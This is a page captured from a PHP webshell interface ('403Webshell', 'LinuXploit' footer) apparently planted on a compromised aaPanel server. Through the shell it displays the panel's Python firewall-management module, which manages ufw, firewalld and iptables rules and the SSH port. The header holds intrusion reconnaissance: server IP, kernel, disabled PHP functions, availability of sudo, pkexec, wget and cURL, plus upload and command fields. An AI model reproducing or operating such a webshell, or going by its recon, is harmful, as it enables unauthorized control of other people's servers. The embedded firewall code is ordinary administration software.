403Webshell
Server IP : 172.67.216.182  /  Your IP : 162.158.88.162
Web Server : Apache
System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/server/panel/class_v2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/server/panel/class_v2/firewalls_v2.py
# coding: utf-8
# +-------------------------------------------------------------------
# | aaPanel x3
# +-------------------------------------------------------------------
# | Copyright (c) 2015-2016 aaPanel(www.aapanel.com) All rights reserved.
# +-------------------------------------------------------------------
# | Author: hwliang <[email protected]>
# +-------------------------------------------------------------------
import sys, os, public, re, firewalld, time
from public.validate import Param


class firewalls:
    __isFirewalld = False
    __isUfw = False
    __Obj = None

    def __init__(self):
        if os.path.exists('/usr/sbin/firewalld'): self.__isFirewalld = True
        self.__ufw = 'ufw'
        if os.path.exists('/usr/sbin/ufw'):
            self.__isUfw = True
            self.__ufw = '/usr/sbin/ufw'
        if self.__isFirewalld:
            try:
                self.__Obj = firewalld.firewalld()
                self.GetList()
            except:
                pass

    # Sync firewalld's accepted ports and dropped addresses into the panel database
    def GetList(self):
        try:
            data = {}
            data['ports'] = self.__Obj.GetAcceptPortList()
            addtime = time.strftime('%Y-%m-%d %X', time.localtime())
            for i in range(len(data['ports'])):
                tmp = self.CheckDbExists(data['ports'][i]['port'])
                if not tmp: public.M('firewall').add('port,ps,addtime', (data['ports'][i]['port'], '', addtime))

            data['iplist'] = self.__Obj.GetDropAddressList()
            for i in range(len(data['iplist'])):
                try:
                    tmp = self.CheckDbExists(data['iplist'][i]['address'])
                    if not tmp: public.M('firewall').add('port,ps,addtime', (data['iplist'][i]['address'], '', addtime))
                except:
                    pass
        except:
            pass

    # Check whether a port/address is already recorded in the database
    def CheckDbExists(self, port):
        """Look up ``port`` in the ``firewall`` table.

        Args:
            port: Value compared (with ``==``) against each row's ``port``
                column; callers in this class pass ports and IP addresses.

        Returns:
            The first matching row (``id``, ``port``, ``ps``, ``addtime``),
            or ``False`` when no row matches.
        """
        rows = public.M('firewall').field('id,port,ps,addtime').select()
        return next((row for row in rows if row['port'] == port), False)

    # Reload the firewall configuration
    def FirewallReload(self):
        """Ask the active firewall backend to reload its rules.

        ufw takes precedence over firewalld; when neither was detected the
        iptables init script is told to save and then restart.  All commands
        are launched with a trailing ``&``.

        Returns:
            None.
        """
        if self.__isUfw:
            commands = ('/usr/sbin/ufw reload &',)
        elif self.__isFirewalld:
            commands = ('firewall-cmd --reload &',)
        else:
            commands = (
                '/etc/init.d/iptables save &',
                '/etc/init.d/iptables restart &',
            )

        for command in commands:
            public.ExecShell(command)

    # Get the firewall status
    def CheckFirewallStatus(self):
        """Report whether the system firewall is currently enabled.

        Earlier revisions parsed the output of ``ufw status verbose``,
        ``systemctl status firewalld`` or ``/etc/init.d/iptables status``
        here; the check is now delegated to ``public.get_firewall_status()``.

        Returns:
            bool: ``True`` when ``public.get_firewall_status()`` returns 1.
        """
        status_code = public.get_firewall_status()
        return status_code == 1

    def SetFirewallStatus(self, get=None):
        """Toggle the system firewall on or off.

        The new state is the opposite of what ``CheckFirewallStatus()``
        currently reports.  ufw and firewalld are each toggled when present.
        The legacy iptables service commands are used only when neither
        front-end was detected.  Previously they were also run on ufw-only
        hosts, because the ``else`` was attached to the firewalld test alone.

        Args:
            get: Unused; accepted for interface compatibility.

        Returns:
            The result of ``public.return_msg_gettext(True, ...)`` describing
            the action that was taken.
        """
        status = not self.CheckFirewallStatus()
        status_msg = {False: 'Close', True: 'Open'}

        commands = []
        if self.__isUfw:
            # "echo y" answers ufw's interactive confirmation prompt.
            action = 'enable' if status else 'disable'
            commands.append('echo y|{} {}'.format(self.__ufw, action))
        if self.__isFirewalld:
            if status:
                commands += ['systemctl enable firewalld', 'systemctl start firewalld']
            else:
                commands += ['systemctl disable firewalld', 'systemctl stop firewalld']
        if not self.__isUfw and not self.__isFirewalld:
            if status:
                commands += ['chkconfig iptables on', '/etc/init.d/iptables start']
            else:
                commands += ['chkconfig iptables off', '/etc/init.d/iptables stop']

        for command in commands:
            public.ExecShell(command)

        public.write_log_gettext('Firewall manager', '{} system firewall!', (status_msg[status],))
        return public.return_msg_gettext(True, '{} system firewall!', (status_msg[status],))

    # Add a blocked IP address
    def AddDropAddress(self, get):
        """Block all traffic from an IP address or CIDR range.

        Args:
            get: Request object.  ``get.port`` carries the address, optionally
                followed by ``/mask``; ``get.ps`` is the remark to store.

        Returns:
            The result of ``public.return_msg_gettext``: a failure when the
            firewall is off, the address is malformed, the address is one
            whose blocking would break the server, the address is already
            listed, or (iptables only) the address is IPv6; a success
            otherwise.

        The address is interpolated into a command string handed to
        ``public.ExecShell`` (presumably a shell), so the *whole* value is
        checked against a strict character whitelist.  Validating only the
        part before ``/`` would let the mask smuggle in extra commands.
        """
        if not self.CheckFirewallStatus():
            return public.return_msg_gettext(False, public.lang("The system firewall is not open"))

        address = get.port
        ip_format = address.split('/')[0]
        if not public.check_ip(ip_format):
            return public.return_msg_gettext(False, public.lang("IP address you entered is illegal!"))
        # Hex digits, ':' and '.' for the host; an optional numeric or
        # dotted mask after a single '/'.  Nothing else may reach the shell.
        if not re.fullmatch(r'[0-9A-Fa-f:.]+(/[0-9.]{1,15})?', address):
            return public.return_msg_gettext(False, public.lang("IP address you entered is illegal!"))
        # 127.0.0.1 is included: dropping loopback traffic breaks local services.
        if ip_format in ('0.0.0.0', '127.0.0.0', '127.0.0.1', '::1'):
            return public.return_msg_gettext(False, public.lang("Disabling this IP will cause your server to fail"))

        if public.M('firewall').where("port=?", (address,)).count() > 0:
            return public.return_msg_gettext(False, public.lang("The IP exists in block list, no need to repeat processing!"))

        is_v6 = public.is_ipv6(ip_format)
        if self.__isUfw:
            if is_v6:
                public.ExecShell('{} deny from {} to any'.format(self.__ufw, address))
            else:
                # Insert at position 1 so the deny wins over later allow rules.
                public.ExecShell('{} insert 1 deny from {} to any'.format(self.__ufw, address))
        elif self.__isFirewalld:
            family = 'ipv6' if is_v6 else 'ipv4'
            public.ExecShell(
                'firewall-cmd --permanent --add-rich-rule=\'rule family={} source address="{}" drop\''.format(
                    family, address))
        else:
            # The plain iptables backend only handles IPv4 here.
            if is_v6:
                return public.return_msg_gettext(False, public.lang("IP address is illegal!"))
            public.ExecShell('iptables -I INPUT -s ' + address + ' -j DROP')

        public.WriteLog("TYPE_FIREWALL", 'FIREWALL_DROP_IP', (address,))
        addtime = time.strftime('%Y-%m-%d %X', time.localtime())
        # Escape the remark the same way AddAcceptPort does before storing it.
        ps = public.xssencode2(get.ps)
        public.M('firewall').add('port,ps,addtime', (address, ps, addtime))
        self.FirewallReload()
        return public.return_msg_gettext(True, public.lang("Setup successfully!"))

    # Remove a blocked IP address
    def DelDropAddress(self, get):
        """Remove a previously blocked IP address or CIDR range.

        Args:
            get: Request object.  ``get.port`` carries the address (optionally
                with ``/mask``) and ``get.id`` the ``firewall`` table row id.

        Returns:
            The result of ``public.return_msg_gettext``: a failure when the
            firewall is off or the address is malformed, a success otherwise.

        The address is interpolated into a command string handed to
        ``public.ExecShell`` (presumably a shell).  It is therefore validated
        first; previously it was used without any check.
        """
        if not self.CheckFirewallStatus():
            return public.return_msg_gettext(False, public.lang("The system firewall is not open"))

        address = get.port
        row_id = get.id
        ip_format = address.split('/')[0]

        host_ok = public.check_ip(ip_format) or public.is_ipv6(ip_format)
        # Whole-string whitelist: host characters plus an optional mask.
        if not host_ok or not re.fullmatch(r'[0-9A-Fa-f:.]+(/[0-9.]{1,15})?', address):
            return public.return_msg_gettext(False, public.lang("IP address you entered is illegal!"))

        if self.__isUfw:
            public.ExecShell('{} delete deny from {} to any'.format(self.__ufw, address))
        elif self.__isFirewalld:
            family = 'ipv6' if public.is_ipv6(ip_format) else 'ipv4'
            public.ExecShell(
                'firewall-cmd --permanent --remove-rich-rule=\'rule family={} source address="{}" drop\''.format(
                    family, address))
        else:
            public.ExecShell('iptables -D INPUT -s ' + address + ' -j DROP')

        public.WriteLog("TYPE_FIREWALL", 'FIREWALL_ACCEPT_IP', (address,))
        public.M('firewall').where("id=?", (row_id,)).delete()

        self.FirewallReload()
        return public.return_msg_gettext(True, public.lang("Successfully deleted"))

    # Open (allow) a port
    def AddAcceptPort(self, get):
        """Open a port or port range and record it in the ``firewall`` table.

        Args:
            get: Request object.  ``get.port`` is a single port or a range
                written ``a-b`` or ``a:b``; it is rewritten in place to the
                ``a:b`` form.  ``get.ps`` is the remark to store.

        Returns:
            The result of ``public.return_msg_gettext``: a failure when the
            firewall is off, the port is malformed or out of range, or the
            port is already recorded; a success otherwise.

        TCP is always opened.  UDP is opened as well unless the port is one
        of the well-known TCP-only entries in ``notudps``.

        Changes from the previous version:
          * The port must be ASCII digits within 1-65535 and a range must be
            ascending.  The old pattern accepted values such as ``99999`` and
            a trailing newline.
          * The iptables UDP rule now uses ``-p udp``; ``-p tcp -m udp`` is
            not a valid combination.
          * The TCP-only check is made on the ``a:b`` form, so it also applies
            on firewalld, where the port is rewritten to ``a-b``.
        """
        if not self.CheckFirewallStatus():
            return public.return_msg_gettext(False, public.lang("The system firewall is not open"))

        src_port = get.port
        get.port = get.port.replace('-', ':')
        port = get.port

        valid = re.fullmatch(r"[0-9]{1,5}(:[0-9]{1,5})?", port) is not None
        if valid:
            bounds = [int(part) for part in port.split(':')]
            valid = 1 <= bounds[0] <= bounds[-1] <= 65535
        if not valid:
            return public.return_msg_gettext(False, public.lang("Port range must be between 22 and 65535!"))

        ps = public.xssencode2(get.ps)
        is_exists = public.M('firewall').where("port=? or port=?", (port, src_port)).count()
        if is_exists:
            return public.return_msg_gettext(False, public.lang("The port exists, no need to repeat the release!"))

        notudps = ['80', '443', '8888', '888', '39000:40000', '21', '22']
        open_udp = port not in notudps

        if self.__isUfw:
            public.ExecShell('{} allow {}/tcp'.format(self.__ufw, port))
            if open_udp:
                public.ExecShell('{} allow {}/udp'.format(self.__ufw, port))
        elif self.__isFirewalld:
            # firewalld writes ranges as "a-b"; that form is also what gets
            # logged and stored, as before.
            port = port.replace(':', '-')
            public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/tcp')
            if open_udp:
                public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/udp')
        else:
            public.ExecShell('iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport ' + port + ' -j ACCEPT')
            if open_udp:
                public.ExecShell('iptables -I INPUT -p udp -m state --state NEW -m udp --dport ' + port + ' -j ACCEPT')

        public.WriteLog("TYPE_FIREWALL", 'FIREWALL_ACCEPT_PORT', (port,))
        addtime = time.strftime('%Y-%m-%d %X', time.localtime())
        public.M('firewall').add('port,ps,addtime', (port, ps, addtime))
        self.FirewallReload()
        return public.return_msg_gettext(True, public.lang("Setup successfully!"))

    # Open a port for both TCP and UDP (no database record is written)
    def AddAcceptPortAll(self, port, ps):
        if not self.CheckFirewallStatus(): return public.return_msg_gettext(False, public.lang("The system firewall is not open"))
        import re
        port = port.replace('-', ':')
        rep = r"^\d{1,5}(:\d{1,5})?$"
        if not re.search(rep, port):
            return False
        if self.__isUfw:
            public.ExecShell('{} allow {}/tcp'.format(self.__ufw, port))
            public.ExecShell('{} allow {}/udp'.format(self.__ufw, port))
        else:
            if self.__isFirewalld:
                port = port.replace(':', '-')
                public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/tcp')
                public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/udp')
            else:
                public.ExecShell('iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport ' + port + ' -j ACCEPT')
                public.ExecShell('iptables -I INPUT -p tcp -m state --state NEW -m udp --dport ' + port + ' -j ACCEPT')
        return True

    # Remove an opened port
    def DelAcceptPort(self, get):
        """Close a previously opened port or port range.

        Args:
            get: Request object.  ``get.port`` is the stored port (single or
                range, ``a:b`` or ``a-b``) and ``get.id`` the ``firewall``
                table row id.  An IPv6 address in ``get.port`` is forwarded
                to ``DelDropAddress``.

        Returns:
            The result of ``public.return_msg_gettext``: a failure when the
            firewall is off, the port is malformed, the port is the panel's
            own port, or any step raises; a success otherwise.

        Changes from the previous version:
          * ``get.port`` is validated before being placed in a command
            string handed to ``public.ExecShell`` (presumably a shell).
          * The range separator is normalised per backend (``:`` for ufw and
            iptables, ``-`` for firewalld), mirroring ``AddAcceptPort``.
          * The iptables UDP rule now uses ``-p udp``; ``-p tcp -m udp`` is
            not a valid combination.
        """
        if not self.CheckFirewallStatus():
            return public.return_msg_gettext(False, public.lang("The system firewall is not open"))
        port = get.port
        row_id = get.id

        # IPv6 addresses are block-list entries, not ports.
        if public.is_ipv6(port):
            return self.DelDropAddress(get)

        try:
            if not re.fullmatch(r"[0-9]{1,5}([:-][0-9]{1,5})?", port):
                return public.return_msg_gettext(False, public.lang("Failed to delete"))
            if port == public.GetHost(True) or port == public.readFile('data/port.pl').strip():
                return public.return_msg_gettext(False, public.lang("Failed,cannot delete current port of the panel"))

            colon_port = port.replace('-', ':')
            dash_port = port.replace(':', '-')
            if self.__isUfw:
                public.ExecShell('{} delete allow {}/tcp'.format(self.__ufw, colon_port))
                public.ExecShell('{} delete allow {}/udp'.format(self.__ufw, colon_port))
            elif self.__isFirewalld:
                public.ExecShell('firewall-cmd --permanent --zone=public --remove-port=' + dash_port + '/tcp')
                public.ExecShell('firewall-cmd --permanent --zone=public --remove-port=' + dash_port + '/udp')
            else:
                public.ExecShell(
                    'iptables -D INPUT -p tcp -m state --state NEW -m tcp --dport ' + colon_port + ' -j ACCEPT')
                public.ExecShell(
                    'iptables -D INPUT -p udp -m state --state NEW -m udp --dport ' + colon_port + ' -j ACCEPT')

            public.WriteLog("TYPE_FIREWALL", 'FIREWALL_DROP_PORT', (port,))
            public.M('firewall').where("id=?", (row_id,)).delete()

            self.FirewallReload()
            return public.return_msg_gettext(True, public.lang("Successfully deleted"))
        except Exception:
            return public.return_msg_gettext(False, public.lang("Failed to delete"))

    # Start or stop the SSH service
    def SetSshStatus(self, get):
        """Start or stop the SSH daemon.

        Args:
            get: Request mapping.  ``get['status']`` equal to 1 requests a
                stop; any other integer requests a start.

        Returns:
            ``public.return_message(0, ...)`` on success, or
            ``public.return_message(-1, ...)`` when a start was requested
            but ``public.get_sshd_status()`` still reports the service down.
        """
        if int(get['status']) == 1:
            msg = public.get_msg_gettext('SSH service turned off')
            act = 'stop'
        else:
            msg = public.get_msg_gettext('SSH service turned on')
            act = 'start'

        # The service name and init system are not detected; every known
        # variant is simply attempted in turn.
        for template in ("/etc/init.d/sshd {}", 'service ssh {}', "systemctl {} sshd", "systemctl {} ssh"):
            public.ExecShell(template.format(act))

        if act == 'start' and not public.get_sshd_status():
            msg = 'SSHD service failed to start'
            public.WriteLog("TYPE_FIREWALL", msg)
            return public.return_message(-1, 0, msg)

        public.WriteLog("TYPE_FIREWALL", msg)
        return public.return_message(0, 0, public.lang("Setup successfully!"))

    # Enable or disable ICMP ping replies
    def SetPing(self, get):
        """Toggle ICMP echo replies via ``/etc/sysctl.conf``.

        Args:
            get: Request object.  ``get.status`` is inverted in place
                (``'1'`` becomes ``'0'``, anything else becomes ``'1'``) and
                the result is written as ``net.ipv4.icmp_echo_ignore_all``.

        Returns:
            ``public.return_message(0, ...)`` after the file was written and
            ``sysctl -p`` was run, or ``public.return_message(-1, ...)`` when
            the file could not be read or written.

        Changes from the previous version:
          * Only the ``icmp_echo_ignore_all`` line is rewritten.  The old
            pattern ``net\\.ipv4\\.icmp_echo.*`` also overwrote
            ``icmp_echo_ignore_broadcasts``.
          * The whole line is replaced, including a leading ``#``, so a
            commented-out entry becomes active.
          * No extra blank line is added on each toggle.
          * An unreadable or missing file no longer raises.
        """
        get.status = '0' if get.status == '1' else '1'

        filename = '/etc/sysctl.conf'
        conf = public.readFile(filename)
        if not isinstance(conf, str):
            # Never overwrite an existing file whose content could not be read.
            if os.path.exists(filename):
                return public.return_message(-1, 0, 'ERROR: setup failed, [sysctl.conf] not readable!')
            conf = ''

        setting = 'net.ipv4.icmp_echo_ignore_all=' + get.status
        line_rep = re.compile(r"^[ \t]*#*[ \t]*net\.ipv4\.icmp_echo_ignore_all[ \t]*=.*$", re.M)
        conf, replaced = line_rep.subn(setting, conf)
        if not replaced:
            if conf and not conf.endswith("\n"):
                conf += "\n"
            conf += setting + "\n"

        if public.writeFile(filename, conf):
            public.ExecShell('sysctl -p')
            return public.return_message(0, 0, public.lang("SUCCESS"))
        else:
            return public.return_message(-1, 0, '<a style="color:red;">ERROR: setup failed, [sysctl.conf] not writable!</a><br>1. If [System hardening] is installed, please close it first<br>')
    # Change the SSH port
    def SetSshPort(self, get):
        """Move sshd to a new port and open that port in the firewall.

        Args:
            get: Request object.  ``get.port`` must pass the ``Param``
                validation below (required, number between 22 and 65535).

        Returns:
            ``public.return_message(0, ...)`` on success, or
            ``public.return_message(-1, ...)`` when validation fails or the
            port is one of the well-known service ports refused below.

        Every ``Port N`` line (commented or not) in ``/etc/ssh/sshd_config``
        is rewritten, the port is opened on the detected backend (firewalld
        first, then ufw, then iptables), sshd is restarted, and the
        ``firewall`` table entry for SSH is replaced.
        """
        # Validate the request parameters.
        try:
            get.validate([
                Param('port').Require().Number(">=", 22).Number("<=", 65535).Xss(),
            ], [
                public.validate.trim_filter(),
            ])
        except Exception as ex:
            public.print_log("error info: {}".format(ex))
            return public.return_message(-1, 0, str(ex))

        port = get.port

        reserved = ('21', '25', '80', '443', '8080', '888', '8888', '7800')
        if port in reserved:
            return public.return_message(-1, 0, public.lang("Do NOT use common default port!"))

        sshd_config = '/etc/ssh/sshd_config'
        content = public.readFile(sshd_config)
        content = re.sub(r"#*Port\s+([0-9]+)\s*\n", "Port " + port + "\n", content)
        public.writeFile(sshd_config, content)

        if self.__isFirewalld:
            commands = [
                'firewall-cmd --permanent --zone=public --add-port=' + port + '/tcp',
                # SELinux is switched off now and for future boots.
                'setenforce 0',
                'sed -i "s#SELINUX=enforcing#SELINUX=disabled#" /etc/selinux/config',
                "systemctl restart sshd.service",
            ]
        elif self.__isUfw:
            commands = [
                '{} allow {}/tcp'.format(self.__ufw, port),
                "service ssh restart",
            ]
        else:
            commands = [
                'iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport ' + port + ' -j ACCEPT',
                "/etc/init.d/sshd restart",
            ]
        for command in commands:
            public.ExecShell(command)

        self.FirewallReload()

        # Replace any earlier SSH record, or any record for this port.
        public.M('firewall').where(
            "ps=? or ps=? or port=?",
            ('SSH remote management service', 'SSH remote service', port),
        ).delete()
        added_at = time.strftime('%Y-%m-%d %X', time.localtime())
        public.M('firewall').add('port,ps,addtime', (port, 'SSH remote service', added_at))
        public.WriteLog("TYPE_FIREWALL", "FIREWALL_SSH_PORT", (port,))
        return public.return_message(0, 0, public.lang("Setup successfully!"))

    # Get SSH information
    def GetSshInfo(self, get):
        """Collect the SSH port, SSH status, ping setting and firewall status.

        Args:
            get: Unused; accepted for interface compatibility.

        Returns:
            ``public.return_message(0, 0, data)`` where ``data`` has the keys
            ``port``, ``status``, ``ping`` and ``firewall_status``.  ``ping``
            is ``False`` only when the first ``icmp_echo_ignore_all`` entry
            found in ``/etc/sysctl.conf`` (commented or not) is set to 1; it
            is ``True`` when the file or the entry cannot be read.
        """
        ssh_port = public.get_sshd_port()
        ssh_status = public.get_sshd_status()

        try:
            sysctl_text = public.readFile('/etc/sysctl.conf')
            found = re.search(r"#*net\.ipv4\.icmp_echo_ignore_all\s*=\s*([0-9]+)", sysctl_text)
            ping_enabled = found.group(1) != '1'
        except:
            # Missing file or missing entry: treat ping as enabled.
            ping_enabled = True

        data = {
            'port': ssh_port,
            'status': ssh_status,
            'ping': ping_enabled,
            'firewall_status': self.CheckFirewallStatus(),
        }
        return public.return_message(0, 0, data)


Youez - 2016 - github.com/yon3zu
LinuXploit